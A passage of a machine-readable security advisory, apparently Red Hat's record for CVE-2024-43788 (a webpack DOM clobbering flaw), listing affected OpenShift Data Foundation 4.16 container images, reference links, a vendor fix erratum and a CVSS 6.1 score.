"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
